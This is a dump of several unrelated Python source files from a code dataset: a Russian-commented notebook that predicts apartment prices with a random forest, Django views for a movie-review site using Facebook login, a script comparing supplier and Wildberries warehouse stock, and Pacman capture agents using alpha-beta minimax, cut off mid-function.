1\n","sub_path":"BS4/code_2.x_22.py","file_name":"code_2.x_22.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"387279957","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import r2_score\n\n\n#%%\nfrom pylab import rcParams\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\nrcParams['figure.figsize'] = 8, 7\n\n#%%\ntrain = pd.read_csv('final/data/train.csv')\n\n#%% Удаляем лишние стобцы\ntrain = train.drop(['Healthcare_1'], axis=1)\n\n#%% Удаляем явно ошибочные записи\ntrain = train.loc[~(train['Id'] == train['Ecology_2'])]\n\n#%% [markdown] \n# Поля Flor и HouseFloor\n\n#%% Убираем очень высокие здания.\ntrain.loc[train['HouseFloor'] > 50, ['HouseFloor']] = train['HouseFloor'].mean().astype('int')\n\n#%% Убираем очень большие этаж.\ntrain.loc[train['Floor'] > 50 , ['Floor']] = train['Floor'].mean().astype('int')\n\n#%% Убираем этажность здания, где этаже больше здания.\ntrain.loc[train['Floor'] > train['HouseFloor'], ['HouseFloor']] = train['Floor']\n\n#%% Cоставим признак, который указывает на первый или последний этаж\ntrain['frs_lst_floor'] = (train['Floor'] == train['HouseFloor']) | (train['Floor'] <= 1)\ntrain['frs_lst_floor'] = train['frs_lst_floor'].astype('int')\n\n#%% [markdown]\n# Поле HouseYear\n\n#%% fix неправильной записи\ntrain.loc[train['HouseYear'] == 20052011, ['HouseYear']] = 2005\n\n#%% Заменяем слишком большие и слишком маленькие года домов на средние по району\ntrain.loc[~train['HouseYear'].between(1800, 2030), ['HouseYear']] = train.loc[train['HouseYear'].between(1800, 2030), :].groupby(['DistrictId'])['HouseYear'].mean().astype('int32')\n\n#%% Определим возраст района\ndist_mean_year = train.groupby(['DistrictId'])[['HouseYear']].mean().astype('int32').reset_index().rename(columns={'HouseYear': 'Dist_mean_year'})\ntrain = train.merge(dist_mean_year, on=('DistrictId'), how='left')\n\n#%% Заполняем пустые года\ntrain.loc[train['HouseYear'].isna(), ['HouseYear']] = train['Dist_mean_year']\n\n#%% Новый признак - исторический дом\ntrain['Historical_House'] = (train['HouseYear'] < 1930).astype('int32')\n\n#%% Новый признак - военные дома\ntrain['War_House'] = (train['HouseYear'].between(1929, 1947)).astype('int32')\n\n#%% Новый признак - дом в процессе строителства или сдачи\ntrain['Not_Finish_House'] = (train['HouseYear'] >= 2018).astype('int32')\n\n#%% [markdown]\n# Поля LifeSquare Square Rooms\n\n#%% Устновка общей площади, которая меньше жилой\ntrain.loc[train['LifeSquare'] > train['Square'], ['Square']] = train['LifeSquare']\n\n#%% Редактирование слишком маленьких площадей\ntrain.loc[train['Square'] < 15, ['Square', 'LifeSquare']] = train[['Square', 'LifeSquare']] * 10\n\n#%% Уделание завышенных площадей\ntrain = train.loc[train['Square'].between(15, 700)]\n\n#%% Средняя комната в районе в домах одного года постройки\nsquare_mean_dist_rooms = train.loc[train['Rooms'] != 0].groupby(['DistrictId', 'Rooms', 'HouseYear'])[['Square']].mean().reset_index().rename(columns={'Square': 'Square_mean_dist_rooms'})\nsquare_mean_dist_rooms['Room_mean_sq'] = square_mean_dist_rooms['Square_mean_dist_rooms'] / square_mean_dist_rooms['Rooms']\nsquare_mean_dist_rooms = square_mean_dist_rooms.drop(['Rooms', 'Square_mean_dist_rooms'], axis=1)\nsquare_mean_dist_rooms = square_mean_dist_rooms.groupby(['DistrictId', 'HouseYear'])['Room_mean_sq'].mean().reset_index()\ntrain = train.merge(square_mean_dist_rooms, on=['DistrictId', 'HouseYear'], how='left')\n\n#%% Выставляем \tRoom_mean_sq у строк, которые не заполнились\ntrain.loc[train['Room_mean_sq'].isna(), ['Room_mean_sq']] = train['Room_mean_sq'].mean()\n\n#%% Расчет количаства комнат \ntrain.loc[train['Rooms'] == 0, ['Rooms']] = (train['Square'] / train['Room_mean_sq']).astype('int32')\ntrain.loc[train['Rooms'] > 6 , ['Rooms']] = (train['Square'] / train['Room_mean_sq']).astype('int32')\ntrain.loc[train['Rooms'] == 0, ['Rooms']] = 1\n\n#%% Ввод показателя Square^2\ntrain['Square_2'] = train['Square'] ** 2\n\n#%% Ввод новых параметров. Нормальное кол-во комнат, Нормальнаый год\ntrain[['N_Rooms', 'N_HouseYear']] = train[['Rooms', 'HouseYear']]\ntrain.loc[train['N_Rooms'] > 3, ['N_Rooms']] = 4\ntrain.loc[train['Historical_House'] == 1, ['N_HouseYear']] = 1910\ntrain['N_HouseYear'] -= train['N_HouseYear'] % 10\n\n#%% Ввод показателя для финасовой составляющей района\ndist_room_mean_price = train.groupby(['DistrictId', 'N_Rooms', 'N_HouseYear'])['Price'].mean().reset_index().rename(columns={'Price':'Mean_Dist_Price'})\ntrain = train.merge(dist_room_mean_price, on=['DistrictId', 'N_Rooms', 'N_HouseYear'], how='left')\n\n#%% [markdown]\n# KitchenSquare и LifeSquare учитывать в расчетах не будем в виду серьезных допущений\n\n#%% [markdown]\n# Поле эколоджи Ecology_1 используем как есть\n\n#%% [markdown]\n# Поле эколоджи Ecology_2 Ecology_3 Shops_2 перевести в dummies\ntrain = pd.get_dummies(train)\n\n#%% [markdown] \n# Обучение\n\n#%% Поля для участия в обучении\nfts = [\n # 'Id',\n # 'DistrictId',\n # 'Rooms',\n # 'Square',\n 'Square_2',\n # 'LifeSquare',\n # 'KitchenSquare',\n 'Floor',\n 'HouseFloor',\n 'HouseYear',\n 'Ecology_1',\n 'Social_1',\n 'Social_2',\n 'Social_3',\n 'Helthcare_2',\n 'Shops_1',\n # 'Price',\n 'frs_lst_floor',\n 'Dist_mean_year',\n 'Historical_House',\n 'War_House',\n 'Not_Finish_House',\n 'Room_mean_sq',\n 'Ecology_2_A',\n 'Ecology_2_B',\n 'Ecology_3_A',\n 'Ecology_3_B',\n 'Shops_2_A',\n 'Shops_2_B',\n 'Mean_Dist_Price',\n # 'N_Rooms',\n # 'N_HouseYear'\n]\n\n#%% Получение тестового и валидационного датасетов\nX = train[fts]\ny = train['Price']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\n# #%% Нормализация данных\n# scaler = StandardScaler()\n# X_train_scaled = scaler.fit_transform(X_train)\n# X_test_scaled = scaler.transform(X_test)\n# X_train_scaled = pd.DataFrame(X_train_scaled, columns=fts)\n# X_test_scaled = pd.DataFrame(X_test_scaled, columns=fts)\n\n# #%% Обучение RF на нормаливанных данных\n# model = RandomForestRegressor(n_estimators=2000, max_depth=15, random_state=42, n_jobs=8)\n# model.fit(X_train_scaled, y_train)\n# train_pred = model.predict(X_train_scaled)\n# r2_score(y_train, train_pred)\n\n# #%% Проверка на нормализованных данных\n# test_pred = model.predict(X_test_scaled)\n# r2_score(y_test, test_pred)\n\n#%% Подбор параметров на стоке\n# score_train = 0\n# score_test = 0\n# best_dep = 0\n# for i in range(100, 2000, 200):\n# model = RandomForestRegressor(n_estimators=i, max_depth=12, random_state=42, n_jobs=8)\n# model.fit(X_train, y_train)\n# train_pred = model.predict(X_train)\n# r2_train = r2_score(y_train, train_pred)\n# test_pred = model.predict(X_test)\n# r2_test = r2_score(y_test, test_pred)\n# if r2_test > score_test:\n# score_test = r2_test\n# score_train = r2_train\n# best_dep = i\n# print('Лучшее {} при dep = {} (train {})'.format(score_test, best_dep, score_train))\n\n#%% Расчет на стоке\nmodel = RandomForestRegressor(n_estimators=700, max_depth=14, random_state=42, n_jobs=8)\nmodel.fit(X_train, y_train)\ntrain_pred = model.predict(X_train)\nr2_train = r2_score(y_train, train_pred)\ntest_pred = model.predict(X_test)\nr2_test = r2_score(y_test, test_pred)\nprint('r2 тест: {}, r2 трайн: {}'.format(r2_test, r2_train))\n\n\n\n\n#0----------------------------------------------------------------------------------------\n\n\n#%% [markdown] \n# Обработка test.csv\n\n#%%\ntest = pd.read_csv('final/data/test.csv')\ntest.describe()\n\n#%% Удаляем лишние стобцы\ntest = test.drop(['Healthcare_1'], axis=1)\n\n#%% Проверяем могут ли быть потенциально ошибочные данные\ntest.loc[test['Id'] == test['Helthcare_2']]\n\n#%% [markdown] \n# Поля Flor и HouseFloor\n\n#%% Убираем очень высокие здания.\ntest.loc[test['HouseFloor'] > 50, ['HouseFloor']] = test['HouseFloor'].mean().astype('int')\n\n#%% Убираем этажность здания, где этаже больше здания.\ntest.loc[test['Floor'] > test['HouseFloor'], ['HouseFloor']] = test['Floor']\n\n#%% Cоставим признак, который указывает на первый или последний этаж\ntest['frs_lst_floor'] = (test['Floor'] == test['HouseFloor']) | (test['Floor'] <= 1)\ntest['frs_lst_floor'] = test['frs_lst_floor'].astype('int')\n\n#%% [markdown]\n# Поле HouseYear\n\n#%% Заменяем слишком большие и слишком маленькие года домов на средние по району\ntest.loc[~test['HouseYear'].between(1800, 2030), ['HouseYear']] = test.loc[test['HouseYear'].between(1800, 2030), :].groupby(['DistrictId'])['HouseYear'].mean().astype('int32')\n\n#%% Определим возраст района\ndist_mean_year = test.groupby(['DistrictId'])[['HouseYear']].mean().astype('int32').reset_index().rename(columns={'HouseYear': 'Dist_mean_year'})\ntest = test.merge(dist_mean_year, on=('DistrictId'), how='left')\n\n#%% Заполняем пустые года\ntest.loc[test['HouseYear'].isna(), ['HouseYear']] = test['Dist_mean_year']\n\n#%% Новый признак - исторический дом\ntest['Historical_House'] = (test['HouseYear'] < 1930).astype('int32')\n\n#%% Новый признак - военные дома\ntest['War_House'] = (test['HouseYear'].between(1929, 1947)).astype('int32')\n\n#%% Новый признак - дом в процессе строителства или сдачи\ntest['Not_Finish_House'] = (test['HouseYear'] >= 2018).astype('int32')\n\n#%% [markdown]\n# Поля LifeSquare Square Rooms\n\n#%% Устновка общей площади, которая меньше жилой\ntest.loc[test['LifeSquare'] > test['Square'], ['Square']] = test['LifeSquare']\n\n#%% Редактирование слишком маленьких площадей\ntest.loc[test['Square'] < 13, ['Square', 'LifeSquare']] = test[['Square', 'LifeSquare']] * 10\n\n\n#%% Средняя комната в районе в домах одного года постройки\nsquare_mean_dist_rooms = test.loc[test['Rooms'] != 0].groupby(['DistrictId', 'Rooms', 'HouseYear'])[['Square']].mean().reset_index().rename(columns={'Square': 'Square_mean_dist_rooms'})\nsquare_mean_dist_rooms['Room_mean_sq'] = square_mean_dist_rooms['Square_mean_dist_rooms'] / square_mean_dist_rooms['Rooms']\nsquare_mean_dist_rooms = square_mean_dist_rooms.drop(['Rooms', 'Square_mean_dist_rooms'], axis=1)\nsquare_mean_dist_rooms = square_mean_dist_rooms.groupby(['DistrictId', 'HouseYear'])['Room_mean_sq'].mean().reset_index()\ntest = test.merge(square_mean_dist_rooms, on=['DistrictId', 'HouseYear'], how='left')\n\n#%% Выставляем \tRoom_mean_sq у строк, которые не заполнились\ntest.loc[test['Room_mean_sq'].isna(), ['Room_mean_sq']] = test['Room_mean_sq'].mean()\n\n#%% Расчет количаства комнат \ntest.loc[test['Rooms'] == 0, ['Rooms']] = (test['Square'] / test['Room_mean_sq']).astype('int32')\ntest.loc[test['Rooms'] > 6 , ['Rooms']] = (test['Square'] / test['Room_mean_sq']).astype('int32')\ntest.loc[test['Rooms'] == 0, ['Rooms']] = 1\n\n#%% Ввод показателя Square^2\ntest['Square_2'] = test['Square'] ** 2\n\n#%% Ввод новых параметров. Нормальное кол-во комнат, Нормальнаый год\ntest[['N_Rooms', 'N_HouseYear']] = test[['Rooms', 'HouseYear']]\ntest.loc[test['N_Rooms'] > 3, ['N_Rooms']] = 4\ntest.loc[test['Historical_House'] == 1, ['N_HouseYear']] = 1910\ntest['N_HouseYear'] -= test['N_HouseYear'] % 10\n\n#%% Ввод показателя для финасовой составляющей района, максимальная точность\ndist_room_mean_price = train.groupby(['DistrictId', 'N_Rooms', 'N_HouseYear'])['Price'].mean().reset_index().rename(columns={'Price':'Mean_Dist_Price'})\ntest = test.merge(dist_room_mean_price, on=['DistrictId', 'N_Rooms', 'N_HouseYear'], how='left')\n\n#%% Mean_Dist_Price из точной стоимости м2\nprice_dist_m2_mean = test.loc[~test['Mean_Dist_Price'].isna()].groupby(['DistrictId','N_HouseYear'])[['Square','Mean_Dist_Price']].mean().reset_index().rename(columns={'Mean_Dist_Price':'Mean_Dist_Price_2'})\nprice_dist_m2_mean['Price_mean_m2'] = price_dist_m2_mean['Mean_Dist_Price_2'] / price_dist_m2_mean['Square']\nprice_dist_m2_mean = price_dist_m2_mean.drop(['Mean_Dist_Price_2', 'Square'], axis=1)\ntest = test.merge(price_dist_m2_mean, on=['DistrictId', 'N_HouseYear'], how='left')\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'] * test['Square']\ntest = test.drop(['Price_mean_m2'], axis=1)\n\n#%% Mean_Dist_Price из неточной стоимости м2\nprice_dist_m2_mean = test.loc[~test['Mean_Dist_Price'].isna()].groupby(['DistrictId'])[['Square','Mean_Dist_Price']].mean().reset_index().rename(columns={'Mean_Dist_Price':'Mean_Dist_Price_2'})\nprice_dist_m2_mean['Price_mean_m2'] = price_dist_m2_mean['Mean_Dist_Price_2'] / price_dist_m2_mean['Square']\nprice_dist_m2_mean = price_dist_m2_mean.drop(['Mean_Dist_Price_2', 'Square'], axis=1)\ntest = test.merge(price_dist_m2_mean, on=['DistrictId'], how='left')\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'] * test['Square']\n\n#%% Mean_Dist_Price дозаполнение средним показателем.\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'].mean() * test['Square']\n\n#%% Создаем dummies\ntest = pd.get_dummies(test)\n\n#%% Обучаем модель на тестовых данных\nmodel = RandomForestRegressor(n_estimators=700, max_depth=14, random_state=42, n_jobs=8)\nmodel.fit(train[fts], train['Price'])\n\n#%% Предстказываем\nprice_pred = model.predict(test[fts])\n\n#%% Сохранение результата в поле Price\ntest['Price'] = price_pred\n\n#%%\ntest[['Id', 'Price']].to_csv('KSidorov_predictions.csv', index=None)\n\n#%%\n","sub_path":"python-for-data-science/final/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":15299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"73166868","text":"from django.shortcuts import render_to_response\nfrom django.shortcuts import redirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout as social_logout\nfrom django.core.files.base import ContentFile\nfrom django.template.defaultfilters import slugify\nfrom django.http import HttpResponse\n\nfrom mavenize.user_profile.models import UserProfile\nfrom mavenize.movie.models import Movie\nfrom mavenize.review.models import Review\nfrom mavenize.review.models import Thanks\nfrom mavenize.movie.models import MoviePopularity\nfrom mavenize.social_graph.models import Following\nfrom mavenize.general_utilities.models import FeedbackForm\n# from actstream.actions import follow\n\nfrom mavenize.general_utilities.utils import retrieve_objects\nfrom urllib2 import urlopen, HTTPError\nimport facebook\n\ndef index(request):\n if request.session.get('social_auth_last_login_backend') == 'facebook':\n return feed(request)\n return render_to_response('index.html', {},\n context_instance=RequestContext(request))\n\n@login_required\ndef login(request):\n user_id = request.user.id\n social_user = request.user.social_auth.get(provider='facebook')\n graph = facebook.GraphAPI(social_user.extra_data['access_token'])\n\n profile, created = UserProfile.objects.get_or_create(\n user=request.user)\n\n if created:\n url = \"http://graph.facebook.com/%s/picture\" % social_user.uid \n small_picture = urlopen(url, timeout=30)\n large_picture = urlopen(url+'?type=large', timeout=30)\n profile.picture_small.save(\n slugify(user_id)+u'.jpg',\n ContentFile(small_picture.read())\n )\n profile.picture_large.save(\n slugify(user_id)+u'_large.jpg',\n ContentFile(large_picture.read()),\n )\n\n return redirect('/')\n\n@login_required\ndef logout(request):\n social_logout(request)\n return redirect('/')\n\n@login_required\ndef feed(request):\n context = load_feed(request, None, 1) \n context['form'] = FeedbackForm()\n\n # Get the top 8 most popular movies\n pm_id = MoviePopularity.objects.all().values_list('movie',flat=True)[:4]\n context['popular_movies'] = Movie.objects.filter(pk__in=pm_id).values(\n 'image', 'url')\n\n return render_to_response('feed.html', context,\n context_instance=RequestContext(request))\n \ndef load_feed(request, review_type, page):\n user_id = request.user.id\n context = {}\n \n # Retrieve the 10 most recent friends reviews\n following = Following.objects.filter(\n fb_user=user_id).values_list('follow',flat=True)\n friend_reviews = Review.objects.filter(user__in=following).values(\n 'review_id',\n 'user',\n 'table_id_in_table',\n 'text',\n 'up_votes',\n 'created_at'\n )[10*(int(page)-1):10*int(page)]\n review_count = len(friend_reviews)\n\n if review_count:\n context['friend_reviews'] = aggregate(user_id, friend_reviews)\n\n if request.is_ajax() and review_type == 'friend':\n if not review_count:\n return HttpResponse(status=204)\n \n return render_to_response(\n 'partials/friend_review.html',\n context,\n context_instance=RequestContext(request)\n )\n \n # If there are less than 10, supplement them with global reviews\n if review_count < 10:\n global_reviews = Review.objects.exclude(\n user__in=following).exclude(user=user_id).values(\n 'review_id',\n 'user',\n 'table_id_in_table',\n 'text',\n 'up_votes',\n 'created_at'\n )[10*(int(page)-1):(10-review_count)*int(page)]\n \n context['global_reviews'] = aggregate(user_id, global_reviews)\n\n if request.is_ajax() and review_type == 'global':\n if not context['global_reviews']:\n return HttpResponse(status=204)\n \n return render_to_response(\n 'partials/global_review.html',\n context,\n context_instance=RequestContext(request)\n )\n \n return context\n\n# Creates a tuple of reviews and movies for a given user and set of reviews\ndef aggregate(user, reviews):\n uids = []\n rids = []\n mids = []\n \n for r in reviews:\n uids.append(r['user'])\n rids.append(r['review_id'])\n mids.append(r['table_id_in_table'])\n\n users = retrieve_objects(\n uids, 'auth', 'User', 'id', 'first_name')\n movies = retrieve_objects(\n mids, 'movie', 'Movie', 'movie_id', 'title', 'image', 'url')\n thanked_reviews = Thanks.objects.filter(review__in=rids).filter(\n giver=user).values_list('review', flat=True)\n\n for review, user, movie in zip(reviews, users, movies):\n review.update(user)\n review.update(movie)\n if review['review_id'] in thanked_reviews:\n review['thanked'] = True\n else:\n review['thanked'] = False\n\n return reviews\n","sub_path":"mavenize-alpha/mavenize/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191362396","text":"import pandas as pd\n\nfrom ru.textilstock.assortment.stocks.remains_djama_parser import parse_djama_stocks\n\nMAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV = '/home/stani/PycharmProjects/texstock/ru/textilstock/assortment' \\\n '/djama/xls/detail_to_nomen_mapping.csv'\n\n\ndef write_data_to_csv(data_frame, output_file_csv):\n s = data_frame.to_csv(index=False)\n with open(output_file_csv, \"w\") as text_file:\n text_file.write(s)\n\n\ndef compare_stocks(djama_stocks_xls, wildberries_stocks_xlsx, output_csv):\n djama_remains_df = parse_djama_stocks(djama_stocks_xls)\n\n remains_to_nomen_dataset = pd.read_csv(MAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV)\n\n skipped = djama_remains_df.join(remains_to_nomen_dataset.set_index('article'),\n on='article', how='left')\n skipped = skipped[skipped['nomenclature'].isnull()]\n if len(skipped) > 0:\n print(\"nomenclature NOT exist in \" + MAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV)\n print(skipped)\n\n djama_remain_nomenclatured = djama_remains_df.join(remains_to_nomen_dataset.set_index('article'),\n on='article', how='inner')\n\n wild_remains_dataset = pd.read_excel(wildberries_stocks_xlsx, skiprows=1)\n stock_compare_df = pd.merge(djama_remain_nomenclatured, wild_remains_dataset,\n how='outer', left_on=['nomenclature'],\n right_on=['Артикул поставщика']\n )\n res = pd.DataFrame(data=stock_compare_df, columns=['article', 'nomenclature', 'count',\n 'Артикул поставщика',\n 'Подольск', 'Новосибирск', 'Хабаровск', 'Краснодар',\n 'Екатеринбург', 'Санкт-Петербург'])\n res['sum_all'] = res.fillna(0)['Подольск'] + res.fillna(0)['Новосибирск'] \\\n + res.fillna(0)['Хабаровск'] + res.fillna(0)['Краснодар'] + \\\n res.fillna(0)['Екатеринбург'] + res.fillna(0)['Санкт-Петербург']\n\n res = res[(res['count'].isnull()) | (res['count'] > 0)]\n\n res = res.rename(columns={\"count\": \"Остаток у Джамы\", \"article\": \"Артикул Джамы\", \"sum_all\": \"Остаток на складах\"})\n res = res[['Артикул Джамы', 'Остаток у Джамы', 'nomenclature', 'Артикул поставщика',\n 'Остаток на складах',\n 'Подольск', 'Новосибирск', 'Хабаровск',\n 'Краснодар', 'Екатеринбург', 'Санкт-Петербург']]\n\n write_data_to_csv(res, output_csv)\n\n\ncompare_stocks('/home/stani/Загрузки/остатки Байрамали (31).xls',\n '/home/stani/Загрузки/ExportToEXCELOPENXML - 2020-06-29T104240.625.xlsx',\n 'out.csv')\n","sub_path":"ru/textilstock/assortment/stocks/compare_stocks.py","file_name":"compare_stocks.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330008245","text":"# myTeam.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\"\"\"\nThis submission is by Joshua Yurtsever and Luke Dzwonczyk. We use minimax and features\nsuch as the number of pelets, dead ends, number of power pelets, and the distance\nfrom ghosts for our AI to make decisions.\n\"\"\"\nimport random\nimport sys\nimport time\nfrom util import manhattanDistance\n\nfrom captureAgents import CaptureAgent\n\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed,\n first = 'DefenseAgent', second = 'OffenseAgent'):\n \"\"\"\n This function should return a list of two agents that will form the\n team, initialized using firstIndex and secondIndex as their agent\n index numbers. isRed is True if the red team is being created, and\n will be False if the blue team is being created.\n\n As a potentially helpful development aid, this function can take\n additional string-valued keyword arguments (\"first\" and \"second\" are\n such arguments in the case of this function), which will come from\n the --redOpts and --blueOpts command-line arguments to capture.py.\n For the nightly contest, however, your team will be created without\n any extra arguments, so you should make sure that the default\n behavior is what you want for the nightly contest.\n \"\"\"\n\n # The following line is an example only; feel free to change it.\n return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n##########\n# Agents #\n##########\n\nclass DefenseAgent(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n def __init__(self, index, timeForComputing = .1):\n CaptureAgent.__init__(self, index, timeForComputing)\n self.steps = 0\n self.defense = True\n self.begintime = time.time()\n\n def evaluationFunction(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n\n closestFoodDist = min(map(lambda x: self.getMazeDistance(x, myPos), self.getFood(gameState).asList()))\n if myState.isPacman:\n return -5\n if invaders:\n invaderDist = min([self.getMazeDistance(myPos, e.getPosition()) for e in invaders if e.getPosition() != None])\n if invaderDist == 0:\n return 10\n else:\n enemyScore = -invaderDist\n else:\n enemyScore = 20 - closestFoodDist\n return foodCount(self.getFoodYouAreDefending(gameState)) + enemyScore + self.getScore(gameState)\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n\n\n def chooseAction(self, gameState):\n \"\"\"\n Picks among actions randomly.\n \"\"\"\n actions = gameState.getLegalActions(self.index)\n self.begintime = time.time()\n '''\n Defense Agent focuses on eating enemy pacman in its zone as long\n as it is not scared.\n '''\n depth = 2\n defense = [self.index]\n agentInds = defense + [i for i in self.getOpponents(gameState) if gameState.getAgentState(i).isPacman and\n gameState.getAgentState(i).getPosition() != None]\n numAgents = len(agentInds)\n def calcWithPrune(gameState, depth, k, alpha, beta):\n if depth == 0 or (time.time() - self.begintime > self.timeForComputing and k == 0):\n actions = gameState.getLegalActions(self.index)\n return self.evaluationFunction(gameState), random.choice(actions)\n acts = gameState.getLegalActions(agentInds[k])\n nextk = (k + 1) % numAgents\n bestAction = None\n if not nextk:\n depth -= 1\n if k >= len(defense): #minimizer\n v = sys.maxint\n for act in acts:\n next = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if next < v:\n v = next\n bestAction = act\n if v < alpha:\n return v, act\n beta = min(beta, v)\n else: #maximizer\n v = -sys.maxint\n for act in acts:\n child = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if child > v:\n v = child\n bestAction = act\n if v > beta:\n return v, act\n alpha = max(alpha, v)\n return v, bestAction\n\n return calcWithPrune(gameState, depth, 0, -sys.maxint, sys.maxint)[1]\n\n\n\n\n\nclass OffenseAgent(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n def __init__(self, index, timeForComputing = .1):\n CaptureAgent.__init__(self, index, timeForComputing)\n self.steps = 0\n self.defense = False\n self.base = None\n self.begintime = time.time()\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n '''\n Your initialization code goes here, if you need any.\n '''\n self.base = gameState.getAgentPosition(self.index)\n self.calibrate = 0\n self.followedCount = 0\n\n def chooseAction(self, gameState):\n \"\"\"\n Finds the best action using minimax\n \"\"\"\n self.begintime = time.time()\n if self.followed(gameState):\n self.followedCount += 1\n else:\n self.followedCount = 0\n if gameState.getAgentState(self.index).numCarrying - self.calibrate >= 5 or self.followedCount > 3:\n if not gameState.getAgentState(self.index).isPacman:\n self.calibrate = gameState.getAgentState(self.index).numCarrying\n actions = gameState.getLegalActions(self.index)\n result = None\n best = -sys.maxint\n for act in actions:\n if act == 'Stop':\n continue\n if self.backeval(gameState.generateSuccessor(self.index, act)) > best:\n result = act\n best = self.backeval(gameState.generateSuccessor(self.index, act))\n return result\n\n depth = 2\n agentInds = [self.index] + [i for i in self.getOpponents(gameState) if not gameState.getAgentState(i).isPacman and\n gameState.getAgentState(i).getPosition() != None]\n numAgents = len(agentInds)\n def calcWithPrune(gameState, depth, k, alpha, beta):\n if depth == 0 or (time.time() - self.begintime > self.timeForComputing and k == 0):\n actions = gameState.getLegalActions(self.index)\n return self.evaluationFunction(gameState), random.choice(actions)\n acts = gameState.getLegalActions(agentInds[k])\n nextk = (k + 1) % numAgents\n bestAction = None\n if not nextk:\n depth -= 1\n if k != 0: #minimizer\n v = sys.maxint\n for act in acts:\n next = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if next < v:\n v = next\n bestAction = act\n if v < alpha:\n return v, act\n beta = min(beta, v)\n else: #maximizer\n v = -sys.maxint\n for act in acts:\n if act == 'Stop':\n continue\n child = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if child > v:\n v = child\n bestAction = act\n if v > beta:\n return v, act\n alpha = max(alpha, v)\n return v, bestAction\n\n return calcWithPrune(gameState, depth, 0, -sys.maxint, sys.maxint)[1]\n def followed(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n newScaredTimes = [g.scaredTimer for g in ghosts]\n newGhostPositions = [g.getPosition() for g in ghosts]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n if ghosts:\n closestGhost = newGhostPositions[0]\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n return self.getMazeDistance(closestGhost, myPos) < 2\n return False\n\n def backeval(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n newScaredTimes = [g.scaredTimer for g in ghosts]\n newGhostPositions = [g.getPosition() for g in ghosts]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n lenCaps = 